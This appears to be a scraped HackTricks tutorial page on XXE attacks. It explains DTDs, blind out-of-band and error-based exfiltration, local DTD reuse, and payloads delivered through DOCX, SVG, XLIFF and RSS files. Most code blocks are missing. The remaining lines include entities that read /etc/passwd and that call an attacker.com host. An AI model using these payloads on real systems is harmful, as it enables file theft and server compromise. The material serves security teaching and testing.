XXE - XEE - XML External Entity
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
XML is a markup language designed for data storage and transport, featuring a flexible structure that allows for the use of descriptively named tags. It differs from HTML by not being limited to a set of predefined tags. XML's significance has declined with the rise of JSON, despite its initial role in AJAX technology.
Data Representation through Entities: Entities in XML enable the representation of data, including special characters like <
and >
, which correspond to <
and >
to avoid conflict with XML's tag system.
Defining XML Elements: XML allows for the definition of element types, outlining how elements should be structured and what content they may contain, ranging from any type of content to specific child elements.
Document Type Definition (DTD): DTDs are crucial in XML for defining the document's structure and the types of data it can contain. They can be internal, external, or a combination, guiding how documents are formatted and validated.
Custom and External Entities: XML supports the creation of custom entities within a DTD for flexible data representation. External entities, defined with a URL, raise security concerns, particularly in the context of XML External Entity (XXE) attacks, which exploit the way XML parsers handle external data sources: <!DOCTYPE foo [ <!ENTITY myentity "value" > ]>
XXE Detection with Parameter Entities: For detecting XXE vulnerabilities, especially when conventional methods fail due to parser security measures, XML parameter entities can be utilized. These entities allow for out-of-band detection techniques, such as triggering DNS lookups or HTTP requests to a controlled domain, to confirm the vulnerability.
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>
In this attack I'm going to test if a simple new ENTITY declaration is working
Lets try to read /etc/passwd
in different ways. For Windows you could try to read: C:\windows\system32\drivers\etc\hosts
In this first case notice that SYSTEM "**file:///**etc/passwd" will also work.
This second case should be useful to extract a file if the web server is using PHP (Not the case of Portswiggers labs)
In this third case notice we are declaring the Element stockCheck
as ANY
In Java based applications it might be possible to list the contents of a directory via XXE with a payload like (just asking for the directory instead of the file):
An XXE could be used to abuse a SSRF inside a cloud
Using the previously commented technique you can make the server access a server you control to show it's vulnerable. But, if that's not working, maybe is because XML entities aren't allowed, in that case you could try using XML parameter entities:
In this occasion we are going to make the server load a new DTD with a malicious payload that will send the content of a file via HTTP request (for multi-line files you could try to ex-filtrate it via _ftp://_ using this basic server for example xxe-ftp-server.rb). This explanation is based in Portswiggers lab here.
In the given malicious DTD, a series of steps are conducted to exfiltrate data:
The structure is as follows:
The steps executed by this DTD include:
Definition of Parameter Entities:
An XML parameter entity, %file
, is created, reading the content of the /etc/hostname
file.
Another XML parameter entity, %eval
, is defined. It dynamically declares a new XML parameter entity, %exfiltrate
. The %exfiltrate
entity is set to make an HTTP request to the attacker's server, passing the content of the %file
entity within the query string of the URL.
Execution of Entities:
The %eval
entity is utilized, leading to the execution of the dynamic declaration of the %exfiltrate
entity.
The %exfiltrate
entity is then used, triggering an HTTP request to the specified URL with the file's contents.
The attacker hosts this malicious DTD on a server under their control, typically at a URL like http://web-attacker.com/malicious.dtd
.
XXE Payload: To exploit a vulnerable application, the attacker sends an XXE payload:
This payload defines an XML parameter entity %xxe
and incorporates it within the DTD. When processed by an XML parser, this payload fetches the external DTD from the attacker's server. The parser then interprets the DTD inline, executing the steps outlined in the malicious DTD and leading to the exfiltration of the /etc/hostname
file to the attacker's server.
In this case we are going to make the server loads a malicious DTD that will show the content of a file inside an error message (this is only valid if you can see error messages). Example from here.
An XML parsing error message, revealing the contents of the /etc/passwd
file, can be triggered using a malicious external Document Type Definition (DTD). This is accomplished through the following steps:
An XML parameter entity named file
is defined, which contains the contents of the /etc/passwd
file.
An XML parameter entity named eval
is defined, incorporating a dynamic declaration for another XML parameter entity named error
. This error
entity, when evaluated, attempts to load a nonexistent file, incorporating the contents of the file
entity as its name.
The eval
entity is invoked, leading to the dynamic declaration of the error
entity.
Invocation of the error
entity results in an attempt to load a nonexistent file, producing an error message that includes the contents of the /etc/passwd
file as part of the file name.
The malicious external DTD can be invoked with the following XML:
Upon execution, the web server's response should include an error message displaying the contents of the /etc/passwd
file.
Please notice that external DTD allows us to include one entity inside the second (eval
), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).
So what about blind XXE vulnerabilities when out-of-band interactions are blocked (external connections aren't available)?.
A loophole in the XML language specification can expose sensitive data through error messages when a document's DTD blends internal and external declarations. This issue allows for the internal redefinition of entities declared externally, facilitating the execution of error-based XXE attacks. Such attacks exploit the redefinition of an XML parameter entity, originally declared in an external DTD, from within an internal DTD. When out-of-band connections are blocked by the server, attackers must rely on local DTD files to conduct the attack, aiming to induce a parsing error to reveal sensitive information.
Consider a scenario where the server's filesystem contains a DTD file at /usr/local/app/schema.dtd
, defining an entity named custom_entity
. An attacker can induce an XML parsing error revealing the contents of the /etc/passwd
file by submitting a hybrid DTD as follows:
The outlined steps are executed by this DTD:
The definition of an XML parameter entity named local_dtd
includes the external DTD file located on the server's filesystem.
A redefinition occurs for the custom_entity
XML parameter entity, originally defined in the external DTD, to encapsulate an error-based XXE exploit. This redefinition is designed to elicit a parsing error, exposing the contents of the /etc/passwd
file.
By employing the local_dtd
entity, the external DTD is engaged, encompassing the newly defined custom_entity
. This sequence of actions precipitates the emission of the error message aimed for by the exploit.
Real world example: Systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd
containing an entity called ISOamso
As this technique uses an internal DTD you need to find a valid one first. You could do this installing the same OS / Software the server is using and searching some default DTDs, or grabbing a list of default DTDs inside systems and check if any of them exists:
For more information check https://portswigger.net/web-security/xxe/blind
In the following awesome github repo you can find paths of DTDs that can be present in the system:
Moreover, if you have the Docker image of the victim system, you can use the tool of the same repo to scan the image and find the path of DTDs present inside the system. Read the Readme of the github to learn how.
For a more in depth explanation of this attack, check the second section of this amazing post from Detectify.
The ability to upload Microsoft Office documents is offered by many web applications, which then proceed to extract certain details from these documents. For instance, a web application may allow users to import data by uploading an XLSX format spreadsheet. In order for the parser to extract the data from the spreadsheet, it will inevitably need to parse at least one XML file.
To test for this vulnerability, it is necessary to create a Microsoft Office file containing an XXE payload. The first step is to create an empty directory to which the document can be unzipped.
Once the document has been unzipped, the XML file located at ./unzipped/word/document.xml
should be opened and edited in a preferred text editor (such as vim). The XML should be modified to include the desired XXE payload, often starting with an HTTP request.
The modified XML lines should be inserted between the two root XML objects. It is important to replace the URL with a monitorable URL for requests.
Finally, the file can be zipped up to create the malicious poc.docx file. From the previously created "unzipped" directory, the following command should be run:
Now, the created file can be uploaded to the potentially vulnerable web application, and one can hope for a request to appear in the Burp Collaborator logs.
The jar protocol is made accessible exclusively within Java applications. It is designed to enable file access within a PKZIP archive (e.g., .zip
, .jar
, etc.), catering to both local and remote files.
To be able to access files inside PKZIP files is super useful to abuse XXE via system DTD files. Check this section to learn how to abuse system DTD files.
The process behind accessing a file within a PKZIP archive via the jar protocol involves several steps:
An HTTP request is made to download the zip archive from a specified location, such as https://download.website.com/archive.zip
.
The HTTP response containing the archive is stored temporarily on the system, typically in a location like /tmp/...
.
The archive is then extracted to access its contents.
The specific file within the archive, file.zip
, is read.
After the operation, any temporary files created during this process are deleted.
An interesting technique to interrupt this process at the second step involves keeping the server connection open indefinitely when serving the archive file. Tools available at this repository can be utilized for this purpose, including a Python server (slow_http_server.py
) and a Java server (slowserver.jar
).
Writing files in a temporary directory can help to escalate another vulnerability that involves a path traversal (such as local file include, template injection, XSLT RCE, deserialization, etc).
On Windows hosts it is possible to get the NTML hash of the web server user by setting a responder.py handler:
and by sending the following request
Then you can try to crack the hash using hashcat
When integrating client data into server-side XML documents, like those in backend SOAP requests, direct control over the XML structure is often limited, hindering traditional XXE attacks due to restrictions on modifying the DOCTYPE
element. However, an XInclude
attack provides a solution by allowing the insertion of external entities within any data element of the XML document. This method is effective even when only a portion of the data within a server-generated XML document can be controlled.
To execute an XInclude
attack, the XInclude
namespace must be declared, and the file path for the intended external entity must be specified. Below is a succinct example of how such an attack can be formulated:
Check https://portswigger.net/web-security/xxe for more info!
Files uploaded by users to certain applications, which are then processed on the server, can exploit vulnerabilities in how XML or XML-containing file formats are handled. Common file formats like office documents (DOCX) and images (SVG) are based on XML.
When users upload images, these images are processed or validated server-side. Even for applications expecting formats such as PNG or JPEG, the server's image processing library might also support SVG images. SVG, being an XML-based format, can be exploited by attackers to submit malicious SVG images, thereby exposing the server to XXE (XML External Entity) vulnerabilities.
An example of such an exploit is shown below, where a malicious SVG image attempts to read system files:
Another method involves attempting to execute commands through the PHP "expect" wrapper:
In both instances, the SVG format is used to launch attacks that exploit the XML processing capabilities of the server's software, highlighting the need for robust input validation and security measures.
Check https://portswigger.net/web-security/xxe for more info!
Note the first line of the read file or of the result of the execution will appear INSIDE the created image. So you need to be able to access the image SVG has created.
Read the following post to learn how to exploit a XXE uploading a PDF file:
PDF Upload - XXE and CORS bypassIf a POST request accepts the data in XML format, you could try to exploit a XXE in that request. For example, if a normal request contains the following:
Then you might be able submit the following request, with the same result:
To change the request you could use a Burp Extension named “Content Type Converter“. Here you can find this example:
Another example can be found here.
This only work if the XML server accepts the data://
protocol.
You can use the ["Encode Recipe" of cyberchef here ]([https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to) transform to UTF-7.
If the web is using PHP, instead of using file:/
you can use php wrappersphp://filter/convert.base64-encode/resource=
to access internal files.
If the web is using Java you may check the jar: protocol.
Trick from https://github.com/Ambrotd/XXE-Notes You can create an entity inside an entity encoding it with html entities and then call it to load a dtd. Note that the HTML Entities used needs to be numeric (like [in this example](https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric entities'%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\).
DTD example:
Extract index.php
If PHP "expect" module is loaded
This example is inspired in https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe
XLIFF (XML Localization Interchange File Format) is utilized to standardize data exchange in localization processes. It's an XML-based format primarily used for transferring localizable data among tools during localization and as a common exchange format for CAT (Computer-Aided Translation) tools.
A request is made to the server with the following content:
However, this request triggers an internal server error, specifically mentioning a problem with the markup declarations:
Despite the error, a hit is recorded on Burp Collaborator, indicating some level of interaction with the external entity.
Out of Band Data Exfiltration To exfiltrate data, a modified request is sent:
This approach reveals that the User Agent indicates the use of Java 1.8. A noted limitation with this version of Java is the inability to retrieve files containing a newline character, such as /etc/passwd, using the Out of Band technique.
Error-Based Data Exfiltration To overcome this limitation, an Error-Based approach is employed. The DTD file is structured as follows to trigger an error that includes data from a target file:
The server responds with an error, importantly reflecting the non-existent file, indicating that the server is attempting to access the specified file:
To include the file's content in the error message, the DTD file is adjusted:
This modification leads to the successful exfiltration of the file's content, as it is reflected in the error output sent via HTTP. This indicates a successful XXE (XML External Entity) attack, leveraging both Out of Band and Error-Based techniques to extract sensitive information.
Valid XML with RSS format to exploit an XXE vulnerability.
Simple HTTP request to attackers server
Using PHP base64 filter
XMLDecoder is a Java class that creates objects based on a XML message. If a malicious user can get an application to use arbitrary data in a call to the method readObject, he will instantly gain code execution on the server.
Extract info via HTTP using own external DTD: https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/\
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)